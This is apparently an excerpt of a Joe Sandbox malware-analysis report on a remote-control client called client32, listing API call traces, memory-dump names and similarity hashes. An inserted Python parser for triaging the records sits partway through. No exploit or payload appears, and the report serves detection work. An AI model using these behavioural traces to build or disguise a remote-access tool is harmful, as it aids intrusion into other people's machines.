• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
• Instruction ID: 2e6e1d300c4266612bf4869b02bb9134ae399a8ea59526bbeac45393f23ca2b2
• Opcode Fuzzy Hash: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
• Instruction Fuzzy Hash: 5FF0553EF4026A63C61362263C49F8FB6688BC1AA8F120071FA10BE684FD20B00041FB
APIs
  • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
• GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
• _memmove.LIBCMT ref: 11031527
• CloseHandle.KERNEL32(?), ref: 11031563
• CloseHandle.KERNEL32(?), ref: 110315C4
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateReadSize_memmove_memset
• String ID:
• API String ID: 845363514-0
• Opcode ID: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
• Instruction ID: f3b86de38a560134af6e2d620d743e83d5971917c983db1a0387e640a4d59ee1
• Opcode Fuzzy Hash: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
• Instruction Fuzzy Hash: E9514FB1E01219AFCB50CFA8D985A9EFBF9FF48318F108529E515E7240E731A901CB51
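Each record above follows the same layout: an APIs list (direct calls plus "Part of subcall function" lines for transitive ones), the memory-dump source, the IDA-plugin snapshot name, and the similarity hashes. To triage a long report it helps to turn these into data. The following is an added example, not part of the report or of Joe Sandbox's tooling: a small Python parser whose SAMPLE text is copied from the CreateFileA/GetFileSize/ReadFile entry above (one "Associated" line kept with its fused "Download File" link text to show it being stripped). Class and field names are my own; the CreateFile argument decoding uses the documented Win32 constants (GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING).

```python
"""Parse Joe Sandbox IDA-plugin function entries into records (added example;
SAMPLE is copied from the report's client32 CreateFileA/ReadFile entry)."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
  • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
• GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
• _memmove.LIBCMT ref: 11031527
• CloseHandle.KERNEL32(?), ref: 11031563
• CloseHandle.KERNEL32(?), ref: 110315C4
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• String ID:
• API String ID: 845363514-0
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(  # "<Name>.<Module>(<args>), ref: <addr>" or "<Name>.<Module> ref: <addr>"
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # raw argument strings as reported; "?" means unknown
    ref: int                # address of the call site
    subcall_of: int = None  # callee address when the call is reported transitively

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # "Opcode ID" -> value, ...
    associated: list = field(default_factory=list)  # other dumps of the same module

    @property
    def image_base(self):
        m = re.search(r"Offset: ([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else None

    @property
    def snapshot_module(self):  # hcaresult_7_2_11000000_client32.jbxd -> client32
        m = re.match(r"hcaresult_\d+_\d+_[0-9A-Fa-f]+_(.+)\.jbxd$",
                     self.fields.get("Snapshot File", ""))
        return m.group(1) if m else None

    def direct_sequence(self):  # API names the function calls itself, in report order
        return [a.name for a in self.apis if a.subcall_of is None]

def parse_entries(text):
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":              # every function record starts here
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if body.endswith("Download File"):  # link text fused onto the value
                body = body[:-len("Download File")].rstrip()
            if section == "APIs":
                m = API_RE.match(body)
                if m:
                    args = m["args"].split(",") if m["args"] is not None else []
                    cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                            int(m["sub"], 16) if m["sub"] else None))
            else:
                key, _, value = body.partition(":")
                if key == "Associated":
                    cur.associated.append(value.strip())
                else:
                    cur.fields[key] = value.strip()
    return entries

def describe_createfile(call):
    """Decode CreateFileA/W constant arguments with the documented Win32 values."""
    def hexarg(i):
        try:
            return int(call.args[i], 16)
        except (IndexError, ValueError):    # "?" or missing argument
            return None
    acc = hexarg(1) or 0
    access = [n for v, n in ((0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"))
              if acc & v]
    disp = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
    return {"access": access or [f"0x{acc:08X}"], "share_read": bool((hexarg(2) or 0) & 1),
            "disposition": disp.get(hexarg(4), "?"), "flags": hexarg(5)}
```

Run over the whole report text rather than SAMPLE, `direct_sequence()` gives one API n-gram per function that can be grepped or fed into a sequence rule, and `describe_createfile()` shows at a glance that this routine opens an existing file read-only with FILE_SHARE_READ, which together with GetFileSize/ReadFile/memmove is a whole-file read into memory, not a write.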
APIs
• __freebuf.LIBCMT ref: 687EA833
  • Part of subcall function 687EA7DE: free.MSVCR100(?,?,?,687EA838,?,?), ref: 687EA7F5
• _fileno.MSVCR100(?,?,?), ref: 687EA839
• _close.MSVCR100(00000000,?,?,?), ref: 687EA83F
• _errno.MSVCR100 ref: 68808B94
• _invalid_parameter_noinfo.MSVCR100 ref: 68808B9F
  • Part of subcall function 687EA595: _fileno.MSVCR100(?,?,?,?,?,?,?,687EA830,?), ref: 687EA5C4
  • Part of subcall function 687EA595: _write.MSVCR100(00000000,?,?,?,?,?,?,687EA830,?), ref: 687EA5CB
• free.MSVCR100(?), ref: 68808BB4
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
• String ID:
• API String ID: 1941134952-0
• Opcode ID: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
• Instruction ID: 13165f964871cb559ee434faa72c00f7c12e1f3cb4042744688c25c3f9545c1d
• Opcode Fuzzy Hash: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
• Instruction Fuzzy Hash: 14F04476901A045AD311163E8E8CB2AB3F85FA2339F844A24F938A74C0EB34C00206B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?,00000000), ref: 688229B1
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?,00000000), ref: 68822A33
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?), ref: 68822B61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: ,$,
                                                                                                                                                                                                    • API String ID: 0-220654547
                                                                                                                                                                                                    • Opcode ID: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                                                                                                                    • Instruction ID: 6e2e0b9714a1430749505ea8ed77b31afdcc409bbe6cdbdb591ac6ae68d1c837
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516B71910709DFCB28DF68C5A0BAEFBB1FF09310F90896ED466A7640D334A981CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
                                                                                                                                                                                                    • _strncmp.LIBCMT ref: 11033572
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110334A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageSend$_strncmp
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
• API String ID: 3653864897-2723064302
• Opcode ID: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
• Instruction ID: bc9ce7f87aeaad0c1939b1cc53b23d9fe1575812c47fb94f3614b61ec272b28a
• Opcode Fuzzy Hash: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
• Instruction Fuzzy Hash: 19410632E1425A5FD712CE748CC0BAAB7E99F81316F1446E5E919DF3D0EA31DA488B40
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strncpy$wsprintf
• String ID: %s (%s)
• API String ID: 2895084632-1363028141
• Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
• Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
• Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
• Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110EB1B1
• _free.LIBCMT ref: 110EB1CC
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
• _free.LIBCMT ref: 110EB293
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue_free$ErrorFreeHeapLast
• String ID: Error %d getting %s
• API String ID: 3888477750-2709163689
• Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
• Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
• Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
• Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
APIs
• GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
• _memmove.LIBCMT ref: 1113F3ED
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ProfileString_memmove
• String ID: ,,LPT1:$Device$Windows
• API String ID: 1665476579-2967085602
• Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
• Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
• Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
• Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3
APIs
• GetMenuItemCount.USER32(?), ref: 1114107C
• _memset.LIBCMT ref: 11141098
• GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemMenu$Info$Count_memset
• String ID: 0
• API String ID: 162323998-4108050209
• Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
• Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
• Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
• Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1
APIs
• LoadStringA.USER32(00000000,?,00000058,24DE4E77), ref: 11141118
• wsprintfA.USER32 ref: 1114112E
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LoadStringwsprintf
• String ID: #%d$..\ctl32\util.cpp$i < cchBuf
• API String ID: 104907563-3240211118
• Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
• Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
• Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
• Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
APIs
• IsWindow.USER32(?), ref: 110335F8
• GetClassNameA.USER32(?,?,00000400), ref: 11033626
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                                                                                                                                                    • API String ID: 2713866921-163732079
                                                                                                                                                                                                    • Opcode ID: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction ID: 7c0026f42908b5e278ccc52ab84e836bf453825b517ccc9397fc8abb106b0303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0BB75E1162D6BDB00DB649D41FEEF76C9F05209F0000A4FF14A6141EA346A058BDA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0
                                                                                                                                                                                                      • Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                    • String ID: EDC$cenctrl.dll$cenctrl_protection
                                                                                                                                                                                                    • API String ID: 145871493-3137230561
                                                                                                                                                                                                    • Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                     • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
